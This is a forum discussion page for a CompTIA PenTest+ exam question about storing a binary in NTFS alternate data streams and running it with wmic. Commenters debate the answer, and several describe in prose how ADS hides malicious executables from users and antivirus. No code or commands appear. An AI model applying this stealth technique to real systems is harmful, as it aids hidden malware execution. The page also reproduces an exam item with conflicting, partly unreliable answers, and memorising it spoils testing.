ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT0-002 All Questions

View all questions & answers for the PT0-002 exam
Go to Exam

Exam PT0-002 topic 1 question 139 discussion

Actual exam question from CompTIA's PT0-002
Question #: 139
Topic #: 1
[All PT0-002 Questions]

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the ymic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. PowerShell modules
  • C. MP4 steganography
  • D. ProcMon
Show Suggested Answer Hide Answer
Suggested Answer: A 🗳️
by Chemical2007 at Sept. 28, 2022, 10:17 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
ryanzou
Highly Voted 2 years, 7 months ago
Selected Answer: B
B FOR SURE
upvoted 10 times
...
cy_analyst
Highly Voted 2 years, 1 month ago
Selected Answer: A
Alternate data streams is the most likely OS or filesystem mechanism that would support running a specially crafted binary using the ymic.exe process call create function. Alternate data streams are a feature of the NTFS filesystem that allow additional data to be stored in a file's metadata, alongside the main data stream. This means that a specially crafted binary could be hidden in an alternate data stream of a legitimate file, and then executed using the ymic.exe process call create function, which allows for the execution of files located in alternate data streams.
upvoted 8 times
[Removed]
2 years, 1 month ago
its wmic not ymic so B is correct
upvoted 1 times
kinny4000
2 months, 3 weeks ago
YMIC.exe is a typo, there is no such thing unless this is a random 3rd party executable. They are referring to WMIC.exe, which does not require any Powershell modules to load binaries. Just the WMIC.exe command line utility.
upvoted 1 times
...
cy_analyst
2 years, 1 month ago
you are correct.
upvoted 4 times
...
cy_analyst
2 years, 1 month ago
Check this out: A. Alternate data streams is the most likely OS or filesystem mechanism to support this objective. Alternate data streams (ADS) is a feature of the Windows NTFS file system that allows data to be stored in a hidden stream of a file. This hidden stream can be accessed and executed using the wmic.exe process call create function, allowing the penetration tester to run the specially crafted binary. PowerShell modules are a collection of scripts that can be used to extend the functionality of PowerShell, but they are not directly related to running a binary using the wmic.exe process call create function. MP4 steganography involves hiding data within an MP4 video file, but this is not related to running a binary using the wmic.exe process call create function. ProcMon is a Windows utility that monitors and logs system activity, but it is not directly related to running a binary using the wmic.exe process call create function.
upvoted 2 times
cy_analyst
2 years, 1 month ago
Ok this is wrong.
upvoted 4 times
...
KingIT_ENG
2 years, 1 month ago
https://docs.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-on-a-remote-computer-by-using-powershell check
upvoted 1 times
...
...
...
[Removed]
2 years, 1 month ago
B is for sure
upvoted 1 times
...
...
kinny4000
Most Recent 2 months, 3 weeks ago
Selected Answer: A
A FOR SURE YMIC.exe is a typo, they mean WMIC.exe, which does not require Powershell for running binaries, it can use the built in command line utility to run a process call create function to read from the alternate data stream (ADS is basically a hidden file within a file that doesn't appear in directory listings and still allows the file to run normally. WMIC.exe can call the hidden file to be executed. So can powershell, but this specifically asks for WMIC.exe)
upvoted 1 times
...
Etc_Shadow28000
9 months, 3 weeks ago
Selected Answer: A
The OS or filesystem mechanism that is MOST likely to support running a specially crafted binary for later execution using the `wmic.exe process call create` function is: A. Alternate data streams
upvoted 2 times
Etc_Shadow28000
9 months, 3 weeks ago
Explanation: Analysis of Other Options: B. PowerShell modules: PowerShell modules are used to package scripts and functions for reuse in PowerShell. While they can be used to run scripts, they are not specifically related to hiding or delaying the execution of a binary through `wmic.exe`. C. MP4 steganography: This involves hiding data within MP4 video files. While it can be used to conceal data, it is not directly related to executing a binary using `wmic.exe`. D. ProcMon: ProcMon (Process Monitor) is a monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. It is not used for executing or hiding binaries. Conclusion: Alternate Data Streams (ADS) are the most suitable mechanism for supporting the objective of running a specially crafted binary for later execution using the `wmic.exe process call create` function. This technique leverages the NTFS file system's capability to hide executable code within files, allowing for stealthy execution.
upvoted 1 times
...
...
surfuganda
1 year, 1 month ago
Selected Answer: A
I'm going with: A. Alternate Data Streams. Had a similar question for CEH exam.
upvoted 3 times
...
deeden
1 year, 1 month ago
Selected Answer: A
Rewording... if I want to hide a malicious .exe file for later execution, which one should I use? Only A and C make sensible answers, but not all Windows systems keep MP4, thus ADS makes more sense.
upvoted 2 times
...
Yokota
1 year, 3 months ago
Selected Answer: A
ADS is a feature of the NTFS file system used in Windows. It allows more than one data stream to be associated with a filename, using the format filename:streamname. This feature can be used to hide files and execute them without being easily detected by users or some security software. A penetration tester could use ADS to hide the specially crafted binary and execute it later, which aligns with the objective described.
upvoted 1 times
...
PhillyCheese
1 year, 4 months ago
Selected Answer: B
Windows Management Instrumentation (WMI) allows scripting languages (such as VBScript or Windows PowerShell) to manage Microsoft Windows personal computers and servers, both locally and remotely. https://en.m.wikipedia.org/wiki/Windows_Management_Instrumentation
upvoted 1 times
PhillyCheese
1 year, 4 months ago
Also, "ymic.exe" is a typo. WMIC.exe is a command-line utility that allows you to access and control Windows-based devices using Windows Management Instrumentation (WMI). WMI is a technology that lets you query and manipulate various aspects of the operating system and hardware. You can use WMIC.exe to perform tasks such as listing processes, services, users, drives, network settings, and more. You can also use WMIC.exe to execute methods, create or delete instances, and modify properties of WMI classes. WMIC.exe is compatible with existing shells and utility commands and can be used by local system administrators. https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmic
upvoted 1 times
...
...
Caoilfhion
1 year, 4 months ago
Don't overthink the question: it's not asking about how to smuggle the binary on the system, how to hide it, or even how to create a shell with it. It's asking "how" to run a binary, already there, the other information given is superfluous and meant to throw you off. While ADS can get it on there, it's not asking that. Doesn't matter (essentially) what is smuggled on there, it's asking how run it. In this case, Powershell is the only thing listed that will start anything... I can only stretch for ProcMon if there's a way to get ProcMon to call wmic.exe that I'm not familiar with (which is possible, I'm not sure). The scenario is stating that it will USE wmic.exe to run an already smuggled binary, but what is the best method of invoking wmic.exe first?
upvoted 1 times
...
stephyfresh13
1 year, 4 months ago
It appears there might be a typographical error in your question, as there is no commonly known tool named "ymic.exe" that I'm aware of. If you meant "wmic.exe" and there is a specific tool or concept you were referring to with "ymic.exe," please provide additional context or clarification. Assuming you are referring to "wmic.exe," here's information about it: wmic.exe (Windows Management Instrumentation Command-line) B is the correct answer
upvoted 1 times
...
pentesternoname
1 year, 5 months ago
Selected Answer: A
Alternate data streams (ADS) is a feature in NTFS (New Technology File System), the file system used by Windows operating systems, that allows additional data to be associated with a file or folder. Penetration testers and attackers can use ADS to hide data or binaries within a file without altering its size or appearance. By creating an alternate data stream and hiding a specially crafted binary within it, an attacker can execute the binary using the ymic.exe process call create function, making it a suitable choice for this objective.
upvoted 1 times
...
solutionz
1 year, 8 months ago
Selected Answer: A
Alternate Data Streams (ADS) are a feature of the NTFS file system used in Windows. They allow data to be embedded within existing files without changing their functionality or size as seen in standard file attributes. This can be exploited by attackers to hide malware or specially crafted binaries within seemingly benign files. So, in this context, the correct option for hiding a specially crafted binary for later execution using a specific process call would be: A. Alternate data streams The other options (PowerShell modules, MP4 steganography, and ProcMon) could have relevance in other contexts, but for hiding a binary within a Windows host, ADS is the most applicable choice.
upvoted 1 times
...
[Removed]
2 years ago
Alternate data streams (ADS) is a feature of the NTFS filesystem in Windows that allows a file to contain additional hidden data streams. These data streams can be accessed and manipulated by the file system API or other utilities, and can be used to store executable code, shellcode, or other malicious payloads that are not visible to the user or antivirus software. By leveraging ADS, a penetration tester can hide the payload in a legitimate-looking file, and then execute it using the ymic.exe process call create function, which will execute the hidden code along with the main program. Therefore, option A is the correct answer.
upvoted 3 times
...
KingIT_ENG
2 years, 1 month ago
B PowerShell module
upvoted 1 times
...
nickwen007
2 years, 1 month ago
The most likely OS or filesystem mechanism to support the objective of running a specially crafted binary using the ymic.exe process is A. Alternate data streams. Alternate data streams allows files to store additional data and metadata in a separate stream that is not visible when viewing the file directly, making it an ideal option for stealthy execution of malicious binaries.
upvoted 3 times
[Removed]
2 years, 1 month ago
Not ymic.exe its wmic.exe so B is correct
upvoted 2 times
cy_analyst
2 years, 1 month ago
Alternate data streams are a feature of the NTFS file system used in Windows that allow data to be hidden within a file without affecting its normal operation. This can be used by attackers to hide malicious code within a file that appears harmless to the system and its users. Using the wmic.exe process call create function, the penetration tester can create a new process and execute the binary from the alternate data stream, thereby bypassing any security measures that would normally detect and prevent the execution of the binary. Options B, C, and D are not relevant to this objective. PowerShell modules are used for scripting and automation tasks in Windows, but they do not provide a means of executing a binary from an alternate data stream. MP4 steganography involves hiding data within multimedia files, which is not applicable to this scenario. ProcMon is a process monitoring tool that can be used to analyze system activity, but it does not provide a means of executing a binary from an alternate data stream.
upvoted 2 times
...
...
...
kloug
2 years, 2 months ago
Alternate data streams are the most likely OS or filesystem mechanism to support running a specially crafted binary for later execution using the wmic.exe process call
upvoted 1 times
[Removed]
2 years, 2 months ago
B is the answer power shell
upvoted 2 times
...
...
[Removed]
2 years, 2 months ago
B is answer
upvoted 2 times
...
Load full discussion...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago